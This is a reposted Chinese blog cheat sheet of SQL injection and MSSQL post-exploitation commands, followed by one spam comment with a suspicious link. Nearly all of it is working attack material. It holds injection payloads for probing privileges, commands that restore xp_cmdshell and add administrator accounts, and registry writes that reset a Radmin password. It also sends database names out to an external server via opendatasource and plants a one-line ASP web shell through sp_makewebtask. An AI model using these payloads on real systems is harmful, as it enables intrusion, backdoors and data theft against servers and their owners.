常用注入命令[转]
文章来源:小灰博客| 时间:2014-03-13 12:22:36| 作者:Leo | 1 条评论
//看看是什么权限的
and 1=(Select IS_MEMBER(‘db_owner’))
And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1 ;–
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(‘master’))
And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1 —
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
‘ and char(124)%2Buser%2Bchar(124)=0 and ”=’
搜索类型
‘ and char(124)%2Buser%2Bchar(124)=0 and ‘%’=’
爆用户名
and user>0
‘ and user>0 and ”=’
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 —
检测是不是MSSQL数据库
and exists (select * from sysobjects);–
检测是否支持多行
;declare @d int;–
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’;–
select * from openrowset(‘sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)
//———————–
// 执行命令
//———————–
首先开启沙盘模式:
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell(“cmd.exe /c net user admin admin1234 /add”)’)
执行命令
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;–
EXEC [master].[dbo].[xp_cmdshell] ‘cmd /c md c:\1111’
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’)
写注册表
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
REG_SZ
读注册表
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’
读取目录内容
exec master..xp_dirtree ‘c:\winnt\system32\’,1,1
数据库备份
backup database pubs to disk = ‘c:\123.bak’
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;–
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,’新密码’,’sa’
添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ‘xp_cmdshell’
添加扩展存储过过程
EXEC [master]..sp_addextendedproc ‘xp_proxiedadata’, ‘c:\winnt\system32\sqllog.dll’
GRANT exec On xp_proxiedadata TO public
停掉或激活某个服务。
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
dbo.xp_subdirs
只列某个目录下的子目录。
xp_getfiledetails ‘C:\Inetpub\wwwroot\SQLInject\login.asp’
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
dbo.xp_makecab
‘c:\test.cab’,’mszip’,1,
‘C:\Inetpub\wwwroot\SQLInject\login.asp’,
‘C:\Inetpub\wwwroot\SQLInject\securelogin.asp’
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab ‘c:\test.cab’,’c:\temp’,1
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
//得到数据库名
insert into opendatasource(‘sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);–
用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123‘;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20”<%25execute(request(“a”))%25>”%20′;–
//更新表内容
Update films SET kind = ‘Dramatic’ Where id = 123
//删除内容
delete from table_name where Stockid = 3
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

一条评论
-
Notification- Process NoKZ98. NEXT >> https://telegra.ph/Message--2868-12-25?hs=20abb68ac955ac5538a5ae131902e2a0&说道:
2025 年 1 月 10 日 上午 11:13
32ucvg